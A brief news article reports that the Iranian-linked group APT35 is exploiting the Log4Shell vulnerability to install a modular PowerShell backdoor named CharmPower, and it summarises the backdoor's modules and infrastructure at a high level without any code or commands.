An Iranian state-sponsored hacker has been detected scanning and attempting to abuse the Log4Shell flaw and deploying a modular backdoor dubbed “CharmPower” for post-exploitation ops.
The recently detected Log4Shell aka CVE-2021-44228 vulnerability in the popular Log4j logging library allows the remote execution of arbitrary code on compromised systems.
Suspected Iranian-backed actor APT35, which is also known as Charming Kitten, Phosphorus, and TA453, has reportedly found a way to conductLog4Shell attacks to deploy CharmPower, a new PowerShell backdoor.
CharmPower has four main initial modules, one for validating network connection, one for gathering basic system information, one for decoding the command and control domain retrieved from a hardcoded URL stored on an Amazon Web Services Inc. S3 bucket, and another to receive, decrypt and execute follow-up modules.
APT35 reportedly used servers hosted by OVH SAS and Hetzner Online GmbH which it has also used in the past.
“Judging by their ability to take advantage of the Log4j vulnerability and by the code pieces of the CharmPower backdoor, the actors are able to change gears rapidly and actively develop different implementations for each stage of their attacks,” said CheckPoint Research.
© Fourth Estate® — All Rights Reserved.
This material may not be published, broadcast, rewritten or redistributed.